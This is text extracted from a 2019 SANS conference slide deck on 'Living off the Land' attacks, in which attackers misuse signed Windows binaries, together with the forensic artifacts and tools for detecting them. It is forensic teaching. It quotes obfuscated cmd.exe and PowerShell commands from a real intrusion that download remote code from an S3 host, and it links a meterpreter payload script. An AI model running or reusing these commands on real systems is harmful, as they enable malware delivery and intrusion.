Alissa Torres

@sibertor
#SANSEnterpriseSummit
3 JUN 2019
“Living off the Land” attributed to Matt
Graeber @mattifestation

Actions on objective that make use of

native Windows binaries, scripts
and/or libraries

Goal: Extend survivability and stay

within the sphere of normal network &
host activity
Re-purposed native Windows binaries, scripts and libraries allow
the attacker to achieve stages of the Kill Chain undetected

LoLBin Chains are common, using a download cradle to obtain a

malicious DLL, register it and instantiate persistence all LoL

Example: Autostart entries (most often the HKCU Run key) launch
execution of PowerShell, regsvr32, rundll32 that downloads,
decodes and invokes script
 GITHUB.COM/LOLBAS-PROJECT/LOLBAS
Criteria to become a LOLBAS:
§ Microsoft signed or downloaded
§ Must have “unexpected functionality”
and a means of being repurposed
§ Must have functionality that would be
useful to APT or Red Team
Oddvar Moe @api0cradle maintains
the LoLBAS project

“Live off the Land” Legitimate Use
binaries
msiexec.exe Win utility that supports install,
(T1218: Signed Binary config and removal of Windows
Proxy Execution) installer files
bginfo.exe Displays host info on desktop
certutil.exe (T1218) Dumps & displays CA config
info, verify certs
atbroker.exe (T1218) Assistive tech support
installutil.exe (T1118) Executes installer components
specified in .NET binaries
mavinject32.exe (T1218) Windows utility that allows for
code injection
For more info, see the LOLBAS Project:
https://lolbas-project.github.io/
Mis-use Technique
Used to execute DLLs or execute rogue
.msi files.
Invokes VBS script to launch payload
Used to bypass whitelisting to
download & write arbitrary data to
filesystem
Register and launch a rogue assistive
technology; standard user
Used to bypass whitelisting; proxy
execution
Used to bypass whitelisting
Used by Windows updates to
download updates without
interrupting or requiring
interaction with user
T1197 - BITS Jobs
 .EXE (2015+)
DECODE/ENCODE/AV-BYPASS

For more info:

docs.microsoft.com/en-us/sysinternals
 .EXE
DECODE/ENCODE/AV-BYPASS

Misused in the wild since 2015

 Example: Poweliks

1 2 3

1. Whitelisted 4
binary; Calls
execution of
exported
function of
arbitrary DLL

2. Module that 3. Exported 4. Function Parameters:Leads to

contains HTTP function within execution of Javascript from the Run
functionality mshtml.dll key in an uncontrolled environment
System Info Display Tool

Gathers and creates a Windows

bitmap of host details such as
hostname, network config, OS
version, hardware specs

For more info:

docs.microsoft.com/en-us/sysinternals
 System Info Display Tool
Can be configured to run VBS
scripts to execute
meterpreter payload for
example

https://github.com/Cn33liz/VBSMet
er/blob/master/VBSMeter.vbs

For more info on misuse:

oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Evidence of Execution and Network Usage
• Where is it found?
• SOFTWARE Registry hive -> %SYSTEM%\sru\srudb.dat
• What it contains?
• Energy Utilization
• Network Usage per Application per Network
Triage and Endpoint Detection and Response
tool that supports Linux, macOS & Windows

Standalone analysis or via Collection Server

for collections across enterprise

Supports customized definitions of artifacts

and yara signatures & VQL (Velociraptor
query language)

Upon detection, dumps process memory of

matches
• Windows.Triage.ProcessMemory
• Windows.Triage.Collectors.WindowsFirewall
• Windows.Triage.Collectors.StartupInfo
• Windows.Triage.Collectors.SRUM
• Windows.Detection.ProcessMemory
• Windows.Events.ProcessCreation
• Windows.Registry.Sysinternals.Eulacheck
Windows.System.Pslist
PID | PPID | PROCESS | PROCESS PATH | ACCOUNT
Cyber Analytic Repository Exploration Tool
https://mitre-attack.github.io/caret
ATT&CKTM Matrix APT “Cobalt Group”

PERSISTENCE New Service, Redundant Access,

Registry Keys, Scheduled Task
PRIVILEGE ESCALATION
UAC Bypass Techniques, File Deletion,
DEFENSE EVASION Obfuscated Files, Process Injection, Regsvr32

CREDENTIAL ACCESS
Network Service
DISCOVERY
LATERAL MOVEMENT Remote Desktop, Remote File Copy

EXECUTION Exploit for client, PowerShell, Regsvr32,

Scheduled Task, Scripting
COLLECTION
EXFILTRATION
Remote Access Tools, Remote File Copy,
COMMAND & CONTROL Standard Application
 3
2nd script downloads a
zip file containing a DLL
that is copied to the
Startup folder

1 2
As a secondary action,
User clicks on .lnk file
PowerShell downloads
that launches browser
another script
and directs to Adobe
masquerading as a BMP file.
Flash Update page
25
PROCDOT: VISUAL MALWARE ANALYSIS TOOL
For more info:
http://www.procdot.com

Correlates ProcMon and Provides an interactive

PCAP Data to track activity timeline of file
malicious code system, registry changes
execution and network traffic
"C:\Windows\system32\cmd.exe"" /V /C set
x4OAGWfxlES02z6NnUkK=2whttpr0&&set
L1U03HmUO6B9IcurCNNlo4=.com&& echo | start
%x4OAGWfxlES02z6NnUkK:~2,4%s://get.adobe%L1U03HmUO6B9IcurCNN
lo4%/br/flashplayer/
"C:\Windows\system32\cmd.exe"" /V /C
set x4OAGWfxlES02z6NnUkK=2whttpr0 &&
set L1U03HmUO6B9IcurCNNlo4=.com &&
echo |
start
%x4OAGWfxlES02z6NnUkK:~2,4%s://get.adobe%L1U03HmUO6B9IcurCNN
lo4%/br/flashplayer/
"C:\Windows\system32\cmd.exe"" /V /C echo |
start 2whttpr0:~2,4%s://get.adobe.com/br/flashplayer/
C:\Windows\system32\cmd.exe /S /D /c"" echo
%jA8Axao1xcZ%(""%jA8Axao1xcZ%(NEw-o%KNhGmAqHG5%ct
NeT.wEbcLient).down%4kxhaz6bqqKC%S%WMkgA3uXa1pXx%NG('%x4OA
GWfxlES02z6NnUkK:~2,4%s://s3-eu-west-
1.amazonaws%L1U03HmUO6B9IcurCNNlo4%/juremasobra2/jureklarj
934t9oi4%Kpl01SsXY5tthb1%')""); ""”
C:\Windows\system32\cmd.exe /S /D /c"" echo
%jA8Axao1xcZ%(""%jA8Axao1xcZ%(NEw-o%KNhGmAqHG5%ct
NeT.wEbcLient).down%4kxhaz6bqqKC%S%WMkgA3uXa1pXx%NG('%x4OA
GWfxlES02z6NnUkK:~2,4%s://s3-eu-west-
1.amazonaws%L1U03HmUO6B9IcurCNNlo4%/juremasobra2/jureklarj
934t9oi4%Kpl01SsXY5tthb1%')""); ""”
28+ Threat Groups are known to use
Powershell Execution for Post-Exploitation
https://mitre-attack.github.io/caret
Execution of PowerShell (Prefetch, Shimcache, Amcache)

Event IDs(40691, 40692) or (4103, 4104- Script Block Logging))

in Microsoft-Windows-PowerShell-Operational log
ConsoleHost_history.txt located in
<User>\AppData\Roaming\Microsoft\Windows\PowerShell\P
SReadline
Fileless malware attacks 10x more likely to succeed than
file-based attacks. – Ponemon Institute 2018
Forensic Analysts Activity in Post-Attack
Execution of PowerShell (Prefetch, Shimcache, Amcache)

Event IDs(40691, 40692) or (4103, 4104- Script Block Logging) in Microsoft-

Windows-PowerShell-Operational log

PowerShell command history logged in ConsoleHost_history.txt

<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline

Analysis of PowerShell, conhost, wsmprovhost process memory

Creation time of shortcut
file to malicious LNK file
shows first access
Shortcut files are small
and often, all of the data is
contained in the MFT
Entry itself, as shown here.
LIVING OFF THE LAND TECHNIQUES
§ Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts),
https://github.com/api0cradle/LOLBAS
§ Hexacorn blog http://www.hexacorn.com/blog/?s=bginfo

POWERSHELL DEOBFUSCATION
§ Under the Wire PowerShell Wargames (underthewire.tech)
§ Finding and Decoding Malicious PowerShell Scripts - Mari DeGrazia
http://blogspot.com/2017/10/finding-and-decoding-malicious
§ Download Cradles: https://gist.github.com/HarmJ0y/bb48307ffa663256e239